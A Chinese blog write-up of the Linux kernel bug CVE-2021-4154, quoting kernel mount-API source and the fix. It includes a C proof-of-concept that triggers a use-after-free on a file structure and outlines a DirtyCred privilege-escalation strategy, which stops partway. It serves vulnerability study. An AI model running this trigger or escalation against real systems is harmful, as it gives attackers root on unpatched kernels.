CVE-2021-4154 Remake

本文最后更新于:2024年4月8日 下午

0x00:写在所有之前

又是一个无地址泄露CVE的复现!

本文所用的源码均为linux 5.8.0

0x01:信息搜集

NVD - CVE-2021-4154 (nist.gov)

影响版本非常广

康一眼commit

下面这个poc可以造成UAF

1
2
3
4
5
//The following sequence can be used to trigger a UAF:
int fscontext_fd = fsopen("cgroup");
int fd_null = open("/dev/null", O_RDONLY);
int fsconfig(fscontext_fd, FSCONFIG_SET_FD, "source", fd_null);
close_range(3, ~0U, 0);

这个是patch

1
2
3
4
5
6
7
8
9
10
11
12
13
diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
index ee93b6e8958746..527917c0b30be4 100644
--- a/kernel/cgroup/cgroup-v1.c
+++ b/kernel/cgroup/cgroup-v1.c
@@ -912,6 +912,8 @@ int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
if (opt == -ENOPARAM) {
if (strcmp(param->key, "source") == 0) {
+ if (param->type != fs_value_is_string)
+ return invalf(fc, "Non-string source");
if (fc->source)
return invalf(fc, "Multiple sources not supported");
fc->source = param->string;

以上便是收集到的资料

0x02:前置知识

新一代mount系统调用

这大概是VFS的胜利🤔

先来康一下老版本的mount是怎么用的

1
2
3
4
5
6
7
8
9
#include <sys/mount.h>  
#include <stdio.h>

/*
 * Legacy one-shot mount example: mount the xfs filesystem on /dev/sdb1 at
 * /mnt/tmp with no flags and no option string.
 *
 * Returns 0 on success. If mount() fails, the reason is printed with
 * perror() and 1 is returned so the caller can tell the mount did not happen.
 */
int main(int argc, char *argv[]) {
	/* Command-line arguments are not used by this example. */
	(void)argc;
	(void)argv;

	if (mount("/dev/sdb1", "/mnt/tmp", "xfs", 0, NULL)) {
		perror("mount failed");
		return 1;
	}
	return 0;
}

简单粗暴,一个函数直接完事

but新的mount API将过去封装的一个“臃肿”的mount拆分成了若干个系统调用(或者说若干个独立的阶段)

首先是fsopen

fsopen

很粗暴的系统调用的封装

1
2
3
4
/*
 * fsopen - userspace wrapper that issues the raw __NR_fsopen system call.
 * @fs_name: name of the filesystem type to open
 * @flags:   flag word passed through unchanged
 *
 * Returns the value produced by syscall(), narrowed to int.
 */
static inline int fsopen(const char *fs_name, unsigned int flags)
{
	long rc = syscall(__NR_fsopen, fs_name, flags);

	return (int)rc;
}

fsopen()的功能与open()系统调用非常相似:open()用于打开一个文件并获取与之相关的文件描述符fd,而fsopen()则旨在打开一个文件系统,并获取该文件系统的上下文。随后,它会将这个文件系统上下文与一个文件描述符绑定,并返回该文件描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/*
* Open a filesystem by name so that it can be configured for mounting.
*
* We are allowed to specify a container in which the filesystem will be
* opened, thereby indicating which namespaces will be used (notably, which
* network namespace will be used for network filesystems).
*
* On success the return value is whatever fscontext_create_fd() returns for
* the new context. Failures return a negative errno: -EPERM, -EINVAL,
* -ENODEV, or an error propagated from one of the helpers called below.
*/
SYSCALL_DEFINE2(fsopen, const char __user *, _fs_name, unsigned int, flags)
{
struct file_system_type *fs_type;
struct fs_context *fc;
const char *fs_name;
int ret;
// Require CAP_SYS_ADMIN in the user namespace that owns the caller's mount namespace.
if (!ns_capable(current->nsproxy->mnt_ns->user_ns, CAP_SYS_ADMIN))
return -EPERM;
// Reject any flag bit other than FSOPEN_CLOEXEC.
if (flags & ~FSOPEN_CLOEXEC)
return -EINVAL;
// Copy the filesystem name in from userspace with strndup_user(), bounded by PAGE_SIZE.
fs_name = strndup_user(_fs_name, PAGE_SIZE);
if (IS_ERR(fs_name))
return PTR_ERR(fs_name);
// Look up the file_system_type for that name; the copied name is freed right after.
fs_type = get_fs_type(fs_name);
kfree(fs_name);
if (!fs_type)
return -ENODEV;
// Create the filesystem context fc for this type.
fc = fs_context_for_mount(fs_type, 0);
put_filesystem(fs_type);// Drop the filesystem-type reference taken by the lookup above.
if (IS_ERR(fc))
return PTR_ERR(fc);
// Mark the context as being in the "creating mount parameters" phase.
fc->phase = FS_CONTEXT_CREATE_PARAMS;
// Allocate the logging context for fc.
ret = fscontext_alloc_log(fc);
if (ret < 0)
goto err_fc;
// Create the file descriptor for fc; O_CLOEXEC is used when FSOPEN_CLOEXEC was passed.
return fscontext_create_fd(fc, flags & FSOPEN_CLOEXEC ? O_CLOEXEC : 0);

err_fc:
put_fs_context(fc);
return ret;
}

其中fs_context是随着这一批新的系统调用一起引入的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
* Filesystem context: the configuration state collected while a mount (or
* reconfiguration) is being set up through the new mount API.
*/
struct fs_context {
// Methods used for the lifetime of the context. Per the article, these are normally set by the filesystem type's init_fs_context method.
const struct fs_context_operations *ops;
struct mutex uapi_mutex; /* Userspace access mutex */
// The filesystem type that is going to be mounted (or reconfigured).
struct file_system_type *fs_type;
// Filesystem-private data, typically holding options that only the specific filesystem can parse.
void *fs_private; /* The filesystem's context */
void *sget_key;
struct dentry *root; /* The root and superblock */
struct user_namespace *user_ns; /* The user namespace for this mount */
struct net *net_ns; /* The network namespace for this mount */
const struct cred *cred; /* The mounter's credentials */
struct fc_log *log; /* Logging buffer */
const char *source; /* The source name (eg. dev path) */
void *security; /* Linux S&M options */
void *s_fs_info; /* Proposed s_fs_info */
unsigned int sb_flags; /* Proposed superblock flags (SB_*) */
unsigned int sb_flags_mask; /* Superblock flags that were changed */
unsigned int s_iflags; /* OR'd with sb->s_iflags */
unsigned int lsm_flags; /* Information flags from the fs to the LSM */
enum fs_context_purpose purpose:8;
enum fs_context_phase phase:8; /* The phase the context is in */
bool need_free:1; /* Need to call ops->free() */
bool global:1; /* Goes into &init_user_ns */
};

PS:注意这里打开的不是一个具体的on-disk文件系统(如/dev/sdb1上的文件系统),而是一个文件系统“类型”

获取了针对文件系统的文件描述符后,接下来步骤是使用**fsconfig()**来对这个文件系统上下文进行配置

fsconfig

1
2
3
4
5
/*
 * fsconfig - userspace wrapper that issues the raw __NR_fsconfig system call.
 * @fsfd: file descriptor of the filesystem context to configure
 * @cmd:  FSCONFIG_* command
 * @key:  parameter name, where the command takes one
 * @val:  parameter value, where the command takes one
 * @aux:  auxiliary integer for the command
 *
 * All arguments are forwarded unchanged; the syscall() result is returned
 * narrowed to int.
 */
static inline int fsconfig(int fsfd, unsigned int cmd,
			   const char *key, const void *val, int aux)
{
	long rc = syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);

	return (int)rc;
}

详细一点的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
/**
* sys_fsconfig - Set parameters and trigger actions on a context
* @fd: The filesystem context to act upon
* @cmd: The action to take
* @_key: Where appropriate, the parameter key to set
* @_value: Where appropriate, the parameter value to set
* @aux: Additional information for the value
*
* This system call is used to set parameters on a context, including
* superblock settings, data source and security labelling.
*
* Actions include triggering the creation of a superblock and the
* reconfiguration of the superblock attached to the specified context.
*
* When setting a parameter, @cmd indicates the type of value being proposed
* and @_key indicates the parameter to be altered.
*
* @_value and @aux are used to specify the value, should a value be required:
*
* (*) fsconfig_set_flag: No value is specified. The parameter must be boolean
* in nature. The key may be prefixed with "no" to invert the
* setting. @_value must be NULL and @aux must be 0.
*
* (*) fsconfig_set_string: A string value is specified. The parameter can be
* expecting boolean, integer, string or take a path. A conversion to an
* appropriate type will be attempted (which may include looking up as a
* path). @_value points to a NUL-terminated string and @aux must be 0.
*
* (*) fsconfig_set_binary: A binary blob is specified. @_value points to the
* blob and @aux indicates its size. The parameter must be expecting a
* blob.
*
* (*) fsconfig_set_path: A non-empty path is specified. The parameter must be
* expecting a path object. @_value points to a NUL-terminated string that
* is the path and @aux is a file descriptor at which to start a relative
* lookup or AT_FDCWD.
*
* (*) fsconfig_set_path_empty: As fsconfig_set_path, but with AT_EMPTY_PATH
* implied.
*
* (*) fsconfig_set_fd: An open file descriptor is specified. @_value must be
* NULL and @aux indicates the file descriptor.
*/
SYSCALL_DEFINE5(fsconfig,
int, fd,
unsigned int, cmd,
const char __user *, _key,
const void __user *, _value,
int, aux)
{
struct fs_context *fc;
struct fd f;
int ret;
int lookup_flags = 0;
// The parameter that is filled in below and handed to vfs_fsconfig_locked().
struct fs_parameter param = {
.type = fs_value_is_undefined,
};

if (fd < 0)
return -EINVAL;
// Per-command validation of which of _key / _value / aux must (not) be supplied.
switch (cmd) {
case FSCONFIG_SET_FLAG:
if (!_key || _value || aux)
return -EINVAL;
break;
case FSCONFIG_SET_STRING:
if (!_key || !_value || aux)
return -EINVAL;
break;
case FSCONFIG_SET_BINARY:
if (!_key || !_value || aux <= 0 || aux > 1024 * 1024)
return -EINVAL;
break;
case FSCONFIG_SET_PATH:
case FSCONFIG_SET_PATH_EMPTY:
if (!_key || !_value || (aux != AT_FDCWD && aux < 0))
return -EINVAL;
break;
case FSCONFIG_SET_FD:
if (!_key || _value || aux < 0)
return -EINVAL;
break;
case FSCONFIG_CMD_CREATE:
case FSCONFIG_CMD_RECONFIGURE:
if (_key || _value || aux)
return -EINVAL;
break;
default:
return -EOPNOTSUPP;
}

f = fdget(fd);
if (!f.file)
return -EBADF;
ret = -EINVAL;
// The file behind fd must use fscontext_fops, i.e. be a filesystem-context file.
if (f.file->f_op != &fscontext_fops)
goto out_f;

fc = f.file->private_data;
// Contexts using legacy_fs_context_ops do not accept blob, path or fd values.
if (fc->ops == &legacy_fs_context_ops) {
switch (cmd) {
case FSCONFIG_SET_BINARY:
case FSCONFIG_SET_PATH:
case FSCONFIG_SET_PATH_EMPTY:
case FSCONFIG_SET_FD:
ret = -EOPNOTSUPP;
goto out_f;
}
}
// Copy the key string from userspace (at most 256 bytes) into param.key.
if (_key) {
param.key = strndup_user(_key, 256);
if (IS_ERR(param.key)) {
ret = PTR_ERR(param.key);
goto out_f;
}
}
// Fill in param.type and the matching member of the value union according to cmd.
switch (cmd) {
case FSCONFIG_SET_FLAG:
param.type = fs_value_is_flag;
break;
case FSCONFIG_SET_STRING:
param.type = fs_value_is_string;
param.string = strndup_user(_value, 256);
if (IS_ERR(param.string)) {
ret = PTR_ERR(param.string);
goto out_key;
}
param.size = strlen(param.string);
break;
case FSCONFIG_SET_BINARY:
param.type = fs_value_is_blob;
param.size = aux;
param.blob = memdup_user_nul(_value, aux);
if (IS_ERR(param.blob)) {
ret = PTR_ERR(param.blob);
goto out_key;
}
break;
case FSCONFIG_SET_PATH_EMPTY:
lookup_flags = LOOKUP_EMPTY;
/* fallthru */
case FSCONFIG_SET_PATH:
param.type = fs_value_is_filename;
param.name = getname_flags(_value, lookup_flags, NULL);
if (IS_ERR(param.name)) {
ret = PTR_ERR(param.name);
goto out_key;
}
param.dirfd = aux;
param.size = strlen(param.name->name);
break;
case FSCONFIG_SET_FD:
// Here the value is a struct file pointer obtained with fget(), stored in param.file.
param.type = fs_value_is_file;
ret = -EBADF;
param.file = fget(aux);
if (!param.file)
goto out_key;
break;
default:
break;
}
// Take the context's userspace-access mutex (interruptible) around the actual operation.
ret = mutex_lock_interruptible(&fc->uapi_mutex);
if (ret == 0) {
ret = vfs_fsconfig_locked(fc, cmd, &param);// Key call: the command/parameter is applied here.
mutex_unlock(&fc->uapi_mutex);
}

/* Clean up the our record of any value that we obtained from
* userspace. Note that the value may have been stolen by the LSM or
* filesystem, in which case the value pointer will have been cleared.
*/
switch (cmd) {
case FSCONFIG_SET_STRING:
case FSCONFIG_SET_BINARY:
kfree(param.string);
break;
case FSCONFIG_SET_PATH:
case FSCONFIG_SET_PATH_EMPTY:
if (param.name)
putname(param.name);
break;
case FSCONFIG_SET_FD:
// If the pointer was cleared ("stolen") by a callee, no fput() happens here.
if (param.file)
fput(param.file);
break;
default:
break;
}
out_key:
kfree(param.key);
out_f:
fdput(f);
return ret;
}

首先是一个结构体变量,这个变量将用于下面的一系列操作

1
2
3
struct fs_parameter param = {
.type = fs_value_is_undefined,
};

看一下define

1
2
3
4
5
6
7
8
9
10
11
12
/*
* One configuration parameter handed from fsconfig() down to the filesystem.
* The value lives in an anonymous union, so string/blob/name/file share the
* same storage and @type records which member is meant.
*/
struct fs_parameter {
const char *key; /* Parameter name */
enum fs_value_type type:8; /* The type of value here */
union {
char *string;
void *blob;
struct filename *name;
struct file *file;
};
size_t size;
int dirfd;
};

vfs_fsconfig_locked

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
/*
* Check the state and apply the configuration. Note that this function is
* allowed to 'steal' the value by setting param->xxx to NULL before returning.
*
* Returns 0 on success or a negative errno. When the create/reconfigure
* paths leave the switch with "break", the context phase is set to
* FS_CONTEXT_FAILED before the error is returned.
*/
static int vfs_fsconfig_locked(struct fs_context *fc, int cmd,
struct fs_parameter *param)
{
struct super_block *sb;
int ret;

ret = finish_clean_context(fc);
if (ret)
return ret;
switch (cmd) {
case FSCONFIG_CMD_CREATE:
// The context must currently be in the FS_CONTEXT_CREATE_PARAMS phase.
if (fc->phase != FS_CONTEXT_CREATE_PARAMS)
return -EBUSY;
// The caller must pass the mount_capable() permission check.
if (!mount_capable(fc))
return -EPERM;
// Move the context to the FS_CONTEXT_CREATING phase.
fc->phase = FS_CONTEXT_CREATING;
// Obtain the filesystem tree for this context.
ret = vfs_get_tree(fc);
if (ret)
break;
sb = fc->root->d_sb;
ret = security_sb_kern_mount(sb);
if (unlikely(ret)) {
fc_drop_locked(fc);
break;
}
up_write(&sb->s_umount);
// Success: the context now waits to be mounted.
fc->phase = FS_CONTEXT_AWAITING_MOUNT;
return 0;
case FSCONFIG_CMD_RECONFIGURE:
if (fc->phase != FS_CONTEXT_RECONF_PARAMS)
return -EBUSY;
fc->phase = FS_CONTEXT_RECONFIGURING;
sb = fc->root->d_sb;
if (!ns_capable(sb->s_user_ns, CAP_SYS_ADMIN)) {
ret = -EPERM;
break;
}
down_write(&sb->s_umount);
ret = reconfigure_super(fc);
up_write(&sb->s_umount);
if (ret)
break;
vfs_clean_context(fc);
return 0;
default:
if (fc->phase != FS_CONTEXT_CREATE_PARAMS &&
fc->phase != FS_CONTEXT_RECONF_PARAMS)
return -EBUSY;
// Every other command (the FSCONFIG_SET_* family) ends up here: parse one parameter.
return vfs_parse_fs_param(fc, param);
}
fc->phase = FS_CONTEXT_FAILED;
return ret;
}

vfs_parse_fs_param

在此之前,我们完成了对param的赋值。现在要做的就是把param里的参数转到文件系统上下文里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
/**
* vfs_parse_fs_param - Add a single parameter to a superblock config
* @fc: The filesystem context to modify
* @param: The parameter
*
* A single mount option in string form is applied to the filesystem context
* being set up. Certain standard options (for example "ro") are translated
* into flag bits without going to the filesystem. The active security module
* is allowed to observe and poach options. Any other options are passed over
* to the filesystem to parse.
*
* This may be called multiple times for a context.
*
* Returns 0 on success and a negative error code on failure. In the event of
* failure, supplementary error information may have been set.
*/
int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
int ret;

if (!param->key)
return invalf(fc, "Unnamed parameter\n");

/* Each stage below returns -ENOPARAM to pass the parameter on to the next one. */
ret = vfs_parse_sb_flag(fc, param->key);
if (ret != -ENOPARAM)
return ret;

ret = security_fs_context_parse_param(fc, param);
if (ret != -ENOPARAM)
/* Param belongs to the LSM or is disallowed by the LSM; so
* don't pass to the FS.
*/
return ret;

/* Filesystem-specific parser, if the filesystem provides one. */
if (fc->ops->parse_param) {
ret = fc->ops->parse_param(fc, param);
if (ret != -ENOPARAM)
return ret;
}

/* If the filesystem doesn't take any arguments, give it the
* default handling of source.
*/
if (strcmp(param->key, "source") == 0) {
/* This default path checks the value type before taking the pointer. */
if (param->type != fs_value_is_string)
return invalf(fc, "VFS: Non-string source");
if (fc->source)
return invalf(fc, "VFS: Multiple sources");
fc->source = param->string;
param->string = NULL;
return 0;
}

return invalf(fc, "%s: Unknown parameter '%s'",
fc->fs_type->name, param->key);
}

其中最重要的一句是

1
ret = fc->ops->parse_param(fc, param);

很显然,这里是需要使用文件系统上下文中的parse_param方法,如果我们设置文件系统为cgroup1

则会调用到cgroup1_parse_param

cgroup1_parse_param

于此,我们终于来到了patch中的目标函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
/*
* cgroup1_parse_param - parse one mount parameter for a cgroup v1 context.
* @fc: the filesystem context being configured
* @param: the parameter to apply
*
* Returns 0 when the parameter was consumed, or a negative error code.
* This is the pre-patch version quoted by the article.
*/
int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
struct cgroup_fs_context *ctx = cgroup_fc2context(fc);
struct cgroup_subsys *ss;
struct fs_parse_result result;
int opt, i;
// Main parser for the mount parameter, driven by the cgroup1_fs_parameters table.
opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
if (opt == -ENOPARAM) {
if (strcmp(param->key, "source") == 0) {
// No check of param->type here: whatever pointer sits in the value
// union is stored into fc->source, and the param copy is cleared.
fc->source = param->string;
param->string = NULL;
return 0;
}
// Otherwise the key may be a subsystem's legacy name: set its bit in subsys_mask.
for_each_subsys(ss, i) {
if (strcmp(param->key, ss->legacy_name))
continue;
ctx->subsys_mask |= (1 << i);
return 0;
}
return invalfc(fc, "Unknown subsys name '%s'", param->key);
}
if (opt < 0)
return opt;

switch (opt) {
case Opt_none:
/* Explicitly have no subsystems */
ctx->none = true;
break;
case Opt_all:
ctx->all_ss = true;
break;
case Opt_noprefix:
ctx->flags |= CGRP_ROOT_NOPREFIX;
break;
case Opt_clone_children:
ctx->cpuset_clone_children = true;
break;
case Opt_cpuset_v2_mode:
ctx->flags |= CGRP_ROOT_CPUSET_V2_MODE;
break;
case Opt_xattr:
ctx->flags |= CGRP_ROOT_XATTR;
break;
case Opt_release_agent:
/* Specifying two release agents is forbidden */
if (ctx->release_agent)
return invalfc(fc, "release_agent respecified");
ctx->release_agent = param->string;
param->string = NULL;
break;
case Opt_name:
/* blocked by boot param? */
if (cgroup_no_v1_named)
return -ENOENT;
/* Can't specify an empty name */
if (!param->size)
return invalfc(fc, "Empty name");
if (param->size > MAX_CGROUP_ROOT_NAMELEN - 1)
return invalfc(fc, "Name too long");
/* Must match [\w.-]+ */
for (i = 0; i < param->size; i++) {
char c = param->string[i];
if (isalnum(c))
continue;
if ((c == '.') || (c == '-') || (c == '_'))
continue;
return invalfc(fc, "Invalid name");
}
/* Specifying two names is forbidden */
if (ctx->name)
return invalfc(fc, "name respecified");
ctx->name = param->string;
param->string = NULL;
break;
}
return 0;
}

调用链可以确定下来

1
2
3
4
sys_fsconfig()
vfs_fsconfig_locked()
vfs_parse_fs_param()
fc->ops->parse_param(cgroup1_parse_param)

到此我们具备了创建一个挂载实例的所有准备工作,下一步就是创建一个挂载实例

创建一个挂载实例需要使用fsmount()

fsmount

这个fsmount创建一个挂载实例后关联到一个新的文件描述符,这个新的文件描述符以O_PATH打开。

1
2
3
4
/*
 * fsmount - userspace wrapper that issues the raw __NR_fsmount system call.
 * @fsfd:     file descriptor of the configured filesystem context
 * @flags:    flag word passed through unchanged
 * @ms_flags: mount attribute flags passed through unchanged
 *
 * Returns the syscall() result narrowed to int.
 */
static inline int fsmount(int fsfd, unsigned int flags, unsigned int ms_flags)
{
	long rc = syscall(__NR_fsmount, fsfd, flags, ms_flags);

	return (int)rc;
}

下面就是最后一步了,我们得到了一个挂载实例,下面就是将这个挂载实例attach到挂载点上。这一步使用move_mount()系统调用。

move_mount

1
2
3
4
5
6
7
8
/*
 * move_mount - userspace wrapper that issues the raw __NR_move_mount system call.
 * @from_dfd:      directory fd the source path is relative to
 * @from_pathname: source path
 * @to_dfd:        directory fd the destination path is relative to
 * @to_pathname:   destination path
 * @flags:         flag word passed through unchanged
 *
 * Returns the syscall() result narrowed to int.
 */
static inline int move_mount(int from_dfd, const char *from_pathname,
			     int to_dfd, const char *to_pathname,
			     unsigned int flags)
{
	long rc = syscall(__NR_move_mount, from_dfd, from_pathname,
			  to_dfd, to_pathname, flags);

	return (int)rc;
}

0x03:漏洞分析

再来看一眼fs_parameter这个结构体,问题出在中间这个union

1
2
3
4
5
6
7
8
9
10
11
12
/*
* Parameter passed down from fsconfig(). The four value pointers are members
* of one anonymous union: they occupy the same storage, so reading ->string
* yields whatever pointer was last stored through ->blob, ->name or ->file.
*/
struct fs_parameter {
const char *key; /* Parameter name */
enum fs_value_type type:8; /* The type of value here */
union {
char *string;
void *blob;
struct filename *name;
struct file *file;
};
size_t size;
int dirfd;
};

sys_fsconfig中,当cmd为FSCONFIG_SET_FD时,会有如下操作

1
2
3
4
5
6
7
case FSCONFIG_SET_FD:
param.type = fs_value_is_file;
ret = -EBADF;
param.file = fget(aux);
if (!param.file)
goto out_key;
break;

此时param.file通过文件描述符指向一个文件实例

但是在接下来的调用链,cgroup1_parse_param中,当key为source时,会把param->string赋值给fc->source

但是由于param结构体中,string和file同处一个union,同一时刻只有其中一个有效,所以此处存在把文件实例(struct file指针)当作字符串传递给fc->source的风险

1
2
3
4
5
6
7
opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
if (opt == -ENOPARAM) {
if (strcmp(param->key, "source") == 0) {
fc->source = param->string;
param->string = NULL;
return 0;
}

接下来,若我们关闭文件描述符fscontext_fd,则会调用到fscontext_fops中的fscontext_release

1
2
3
4
5
/*
* File operations installed on filesystem-context files; .release is the
* hook that points at fscontext_release.
*/
const struct file_operations fscontext_fops = {
.read = fscontext_read,
.release = fscontext_release,
.llseek = no_llseek,
};

fscontext_release中会调用put_fs_context

1
2
3
4
5
6
7
8
9
10
/*
* Release hook of fscontext_fops: detach the fs_context stored in
* file->private_data and drop it with put_fs_context(). Always returns 0.
*/
static int fscontext_release(struct inode *inode, struct file *file)
{
struct fs_context *fc = file->private_data;

if (fc) {
/* Clear the pointer first so the file no longer refers to the context. */
file->private_data = NULL;
put_fs_context(fc);
}
return 0;
}

put_fs_context会释放fc->source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/**
* put_fs_context - Dispose of a superblock configuration context.
* @fc: The context to dispose of.
*/
void put_fs_context(struct fs_context *fc)
{
struct super_block *sb;

/* If a root was already obtained, drop it and deactivate its superblock. */
if (fc->root) {
sb = fc->root->d_sb;
dput(fc->root);
fc->root = NULL;
deactivate_super(sb);
}

if (fc->need_free && fc->ops && fc->ops->free)
fc->ops->free(fc);

security_free_mnt_opts(&fc->security);
put_net(fc->net_ns);
put_user_ns(fc->user_ns);
put_cred(fc->cred);
put_fc_log(fc);
put_filesystem(fc->fs_type);
/* fc->source is handed straight to kfree(), whatever object it points to. */
kfree(fc->source);
kfree(fc);
}

若之前将fc->source指向一个文件实例,那么在此处释放后,该实例事实上还在使用中

可以关闭与之关联的文件描述符造成double free

可以写个小demo测试一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <linux/mount.h>
#include <linux/unistd.h>

int tmp;

/*
 * err_exit - report a fatal error and terminate the process.
 * @msg: text appended to the coloured "[x] Error at: " prefix
 *
 * Prints the message on stdout, pauses for five seconds, then exits with
 * EXIT_FAILURE. Does not return.
 */
void err_exit(char *msg)
{
	const unsigned int pause_seconds = 5;

	printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
	sleep(pause_seconds);
	exit(EXIT_FAILURE);
}


/*
* Demo from the article: open a "cgroup" filesystem context, pass the
* /dev/null descriptor as its "source" via FSCONFIG_SET_FD, close the context,
* then open /dev/ptmx and keep the descriptor in the global tmp.
*/
int main()
{
int fscontext_fd;
fscontext_fd = syscall(__NR_fsopen, "cgroup", FSOPEN_CLOEXEC);
if (fscontext_fd < 0)
err_exit("fsopen failed!");

int fd_null = open("/dev/null", O_RDONLY);
if (fd_null < 0)
err_exit("open /dev/null failed!");

/* The fsconfig return value is not checked. */
syscall(__NR_fsconfig, fscontext_fd, FSCONFIG_SET_FD, "source", NULL, fd_null);
close(fscontext_fd);

/* fd_null is still open at this point; the open() result is not checked. */
tmp = open("/dev/ptmx", O_RDONLY);


}

可以看到在put_fs_context中释放的是0xffff888005f59c00的堆块

在接下来打开/dev/ptmx的过程中,发现重新申请到的file结构体和之前释放的堆块地址相同

但是此时fd_null并未关闭,于是,此时是/dev/null和/dev/ptmx共用一个file

0x04:漏洞利用——dirtycred!!!

于此处实践一下dirtycred这一手法

根据漏洞,可以造成一个file凭证的UAF,步骤如下:

  1. 当在用户态打开一个文件时,内核会分配一个file结构体,用来保存文件的信息
  2. 利用fsopen打开一个文件系统,使用fsconfig可以指定已经打开的文件和文件系统
  3. fsconfig中存在参数解析漏洞,导致关闭文件系统上下文时,会造成file结构体的释放,形成UAF漏洞
  4. 接下来不断地打开文件,可以分配到被释放的file结构,此时,存在两个文件描述符指向同一个file结构体

下图来自blingbling师傅的blog呜呜

根据dirtycred的思路,在文件检查和实际写入间隙,将file结构体替换成无写入权限的特权文件

一般来说,write的函数调用链为

1
2
3
4
5
6
sys_write()
ksys_write()
vfs_write()
new_sync_write
call_write_iter
file->f_op->write_iter

vfs_write

vfs_write中,会check将要写入的文件是否具有可写入权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/*
* vfs_write - write @count bytes from the user buffer @buf to @file at *@pos.
*
* All permission/mode checks are done up front on file->f_mode; the actual
* write is then delegated to the file's ->write or ->write_iter method.
* Returns the method's result, or a negative errno from the checks.
*/
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;

if (!(file->f_mode & FMODE_WRITE)) // check: FMODE_WRITE must be set in f_mode
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE)) // check: FMODE_CAN_WRITE must be set in f_mode
return -EINVAL;
if (unlikely(!access_ok(buf, count)))
return -EFAULT;

ret = rw_verify_area(WRITE, file, pos, count);
if (ret)
return ret;
if (count > MAX_RW_COUNT)
count = MAX_RW_COUNT;
file_start_write(file);
/* f_mode is not examined again from here on. */
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
else if (file->f_op->write_iter)
ret = new_sync_write(file, buf, count, pos);
else
ret = -EINVAL;
if (ret > 0) {
fsnotify_modify(file);
add_wchar(current, ret);
}
inc_syscw(current);
file_end_write(file);
return ret;
}

在不同的文件系统中,file->f_op->write_iter不同。以常见的ext4文件系统为例,write_iter对应ext4_file_write_iter,在非DAX、非direct IO的情况下最终会走到ext4_buffered_write_iter

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
* Buffered write path of ext4: perform the write described by @iocb/@from
* while holding the lock of the inode behind iocb->ki_filp.
*/
static ssize_t ext4_buffered_write_iter(struct kiocb *iocb,
struct iov_iter *from)
{
ssize_t ret;
struct inode *inode = file_inode(iocb->ki_filp);

if (iocb->ki_flags & IOCB_NOWAIT)
return -EOPNOTSUPP;

inode_lock(inode); // Inode lock held until inode_unlock() at out:; per the article, this allows only one writer on the inode at a time.
ret = ext4_write_checks(iocb, from);
if (ret <= 0)
goto out;

ret = generic_perform_write(iocb, from);

out:
inode_unlock(inode);
if (unlikely(ret <= 0))
return ret;
return generic_write_sync(iocb, ret);
}

下图也是来自blingbling师傅的blog

但是,这个时间窗口非常小。且常用的userfaultfd在5.11版本及以后,默认无法在非特权用户下使用,而代替userfaultfd的FUSE笔者还8会。便采用了向文件写入大量data这一方法——因为文件系统不允许两个进程同时写同一个文件,假设进程A/B同时对同一文件写入,进程A先获取锁,写入大量数据(1G文件大概要写2-3秒,可以说是很长的时间窗口了),进程B在完成check后等待获取锁,那么这中间的时间就可以替换file结构体

下图还是来自blingbling师傅的blog

PS1:fsopen和fsconfig只有在具备CAP_SYS_ADMIN权限时才可使用,所以需要创建新的user namespace来绕过该限制

PS2:对将要打开的普通权限文件创建一个链接

ksys_write中,会调用到fdget_pos

1
2
3
4
5
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
struct fd f = fdget_pos(fd);
ssize_t ret = -EBADF;
.......

fdget_pos是__fdget_pos的套娃

